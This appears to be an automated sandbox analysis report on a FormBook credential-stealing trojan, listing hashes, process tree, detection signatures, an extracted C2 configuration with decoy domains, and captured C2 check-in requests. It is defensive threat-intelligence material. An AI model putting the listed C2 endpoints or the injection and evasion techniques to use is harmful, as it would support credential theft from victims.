Analysis Report lTAPQJikGw

Overview

General Information

Sample Name: lTAPQJikGw (renamed file extension from none to exe)
Analysis ID: 432746
MD5: 16657fa097cd334973a5489eeff8bafe
SHA1: b6db5e9cc112155b7285f0a415cf4889ff1bf7ef
SHA256: 2589143d02f6aef252b5b704f6b98723ae131d3279bcf36d57ee26318bc0741f
Tags: exe, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • lTAPQJikGw.exe (PID: 7056 cmdline: 'C:\Users\user\Desktop\lTAPQJikGw.exe' MD5: 16657FA097CD334973A5489EEFF8BAFE)
    • lTAPQJikGw.exe (PID: 6192 cmdline: C:\Users\user\Desktop\lTAPQJikGw.exe MD5: 16657FA097CD334973A5489EEFF8BAFE)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • control.exe (PID: 6848 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
        • cmd.exe (PID: 6952 cmdline: /c del 'C:\Users\user\Desktop\lTAPQJikGw.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author
2.0.lTAPQJikGw.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.0.lTAPQJikGw.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
2.0.lTAPQJikGw.exe.400000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
2.0.lTAPQJikGw.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.0.lTAPQJikGw.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Antivirus detection for URL or domain
          Source: http://www.cmannouncements.com/p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS, Avira URL Cloud: Label: malware
          Source: http://www.balloon-artists.com/p2io/?CFQHg=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d78EfQIVSnp&Pr980v=G2MtWNVHS, Avira URL Cloud: Label: malware
          Source: http://www.boogerstv.com/p2io/?CFQHg=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&Pr980v=G2MtWNVHS, Avira URL Cloud: Label: malware
          Source: http://www.dreamcashbuyers.com/p2io/?CFQHg=H0m9fF/5FM7UqIICC4653EpAABAppk+gPAvqYefbAICNl1a1FFJvvx6E9HTJL6Hcfv3l&Pr980v=G2MtWNVHS, Avira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook (configuration identical to the one listed under Malware Configuration)
          Multi AV Scanner detection for submitted file
          Source: lTAPQJikGw.exe, Virustotal: Detection: 44%
          Source: lTAPQJikGw.exe, ReversingLabs: Detection: 43%
          Yara detected FormBook
          Source: Yara match, File source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sample
          Source: lTAPQJikGw.exe, Joe Sandbox ML: detected
          Source: 2.0.lTAPQJikGw.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.lTAPQJikGw.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: lTAPQJikGw.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: lTAPQJikGw.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.697776172.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\xxwqcHkmba\src\obj\Debug\CryptoConfig.pdb source: lTAPQJikGw.exe
          Source: Binary string: control.pdb source: lTAPQJikGw.exe, 00000002.00000002.730162331.0000000001970000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: lTAPQJikGw.exe, 00000002.00000002.729531949.00000000015CF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: lTAPQJikGw.exe, control.exe
          Source: Binary string: control.pdbUGP source: lTAPQJikGw.exe, 00000002.00000002.730162331.0000000001970000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.697776172.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_01870448
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_01870751
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_01870760
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe, Code function: 4x nop then pop edi 2_2_00416282
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe, Code function: 4x nop then pop ebx 2_2_00406A94
          Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then pop ebx 7_2_00936A95
          Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then pop edi 7_2_00946282

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 74.220.199.8:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 74.220.199.8:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 74.220.199.8:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 199.195.117.147:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 199.195.117.147:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 199.195.117.147:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 104.21.15.16:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 104.21.15.16:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 104.21.15.16:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.adultpeace.com/p2io/
          Source: global traffic, HTTP traffic detected: GET /p2io/?CFQHg=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d78EfQIVSnp&Pr980v=G2MtWNVHS HTTP/1.1 Host: www.balloon-artists.com Connection: close
          Source: global traffic, HTTP traffic detected: GET /p2io/?CFQHg=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&Pr980v=G2MtWNVHS HTTP/1.1 Host: www.adultpeace.com Connection: close
          Source: global traffic, HTTP traffic detected: GET /p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS HTTP/1.1 Host: www.cmannouncements.com Connection: close
          Source: global traffic, HTTP traffic detected: GET /p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS HTTP/1.1 Host: www.cmannouncements.com Connection: close
          Source: global traffic, HTTP traffic detected: GET /p2io/?CFQHg=Z8FkwwkqwMcbR63JqM/eMJCTIQtJD+6S4GLVkEvBdcKRRdmUAPmyd56itTHHstyDZ3vx&Pr980v=G2MtWNVHS HTTP/1.1 Host: www.leonardocarrillo.com Connection: close
          Source: global traffic, HTTP traffic detected: GET /p2io/?CFQHg=H0m9fF/5FM7UqIICC4653EpAABAppk+gPAvqYefbAICNl1a1FFJvvx6E9HTJL6Hcfv3l&Pr980v=G2MtWNVHS HTTP/1.1 Host: www.dreamcashbuyers.com Connection: close
          Source: global traffic, HTTP traffic detected: GET /p2io/?CFQHg=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIp2mnBj9Pa&Pr980v=G2MtWNVHS HTTP/1.1 Host: www.swayam-moj.com Connection: close
          Source: global traffic, HTTP traffic detected: GET /p2io/?CFQHg=DTtQlm+bkwamRHt6VrobrkMYYvpq+NlfspH3ROyN3o99G08d4+CoiJMc5PUrO1w4I+TP&Pr980v=G2MtWNVHS HTTP/1.1 Host: www.hfjxhs.com Connection: close
          Source: global traffic, HTTP traffic detected: GET /p2io/?CFQHg=lrOqxb+RJFhwpubsYZ1tkMjkgx31NOkXgmE0j6vPa760pj23uu3lC+ndsaG2+azAf30S&Pr980v=G2MtWNVHS HTTP/1.1 Host: www.defenestration.world Connection: close
          Source: global traffic, HTTP traffic detected: GET /p2io/?CFQHg=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&Pr980v=G2MtWNVHS HTTP/1.1 Host: www.boogerstv.com Connection: close
          Source: global traffic, HTTP traffic detected: GET /p2io/?CFQHg=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MooJpxvMOcw&Pr980v=G2MtWNVHS HTTP/1.1 Host: www.totally-seo.com Connection: close
          Source: global traffic, HTTP traffic detected: GET /p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&Pr980v=G2MtWNVHS HTTP/1.1 Host: www.cleanxcare.com Connection: close
          Source: Joe Sandbox View, IP Address: 147.255.162.204
          Source: Joe Sandbox View, IP Address: 198.185.159.144
          Source: Joe Sandbox View, ASN Name: LEASEWEB-USA-SFO-12US
          Source: unknown, DNS traffic detected: queries for: www.balloon-artists.com
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 10 Jun 2021 16:08:23 GMT Server: Apache/2.4.48 (cPanel) OpenSSL/1.1.1k mod_bwlimited/1.4 Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
          Source: lTAPQJikGw.exe, 00000000.00000002.657793972.0000000003341000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000003.00000000.688234599.0000000002B50000.00000002.00000001.sdmp, String found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmp, String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: control.exe, 00000007.00000002.917583197.0000000005212000.00000004.00000001.sdmp, String found in binary or memory: https://www.cleanxcare.com/p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_004181B0 NtCreateFile,2_2_004181B0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00418260 NtReadFile,2_2_00418260
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_004182E0 NtClose,2_2_004182E0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00418390 NtAllocateVirtualMemory,2_2_00418390
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_004182AC NtReadFile,2_2_004182AC
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041838B NtAllocateVirtualMemory,2_2_0041838B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01519910
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015199A0 NtCreateSection,LdrInitializeThunk,2_2_015199A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519840 NtDelayExecution,LdrInitializeThunk,2_2_01519840
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01519860
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015198F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_015198F0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519A50 NtCreateFile,LdrInitializeThunk,2_2_01519A50
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01519A00
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519A20 NtResumeThread,LdrInitializeThunk,2_2_01519A20
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519540 NtReadFile,LdrInitializeThunk,2_2_01519540
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015195D0 NtClose,LdrInitializeThunk,2_2_015195D0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519710 NtQueryInformationToken,LdrInitializeThunk,2_2_01519710
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519FE0 NtCreateMutant,LdrInitializeThunk,2_2_01519FE0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519780 NtMapViewOfSection,LdrInitializeThunk,2_2_01519780
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015197A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_015197A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01519660
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015196E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_015196E0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01519950 NtQueueApcThread,2_2_01519950
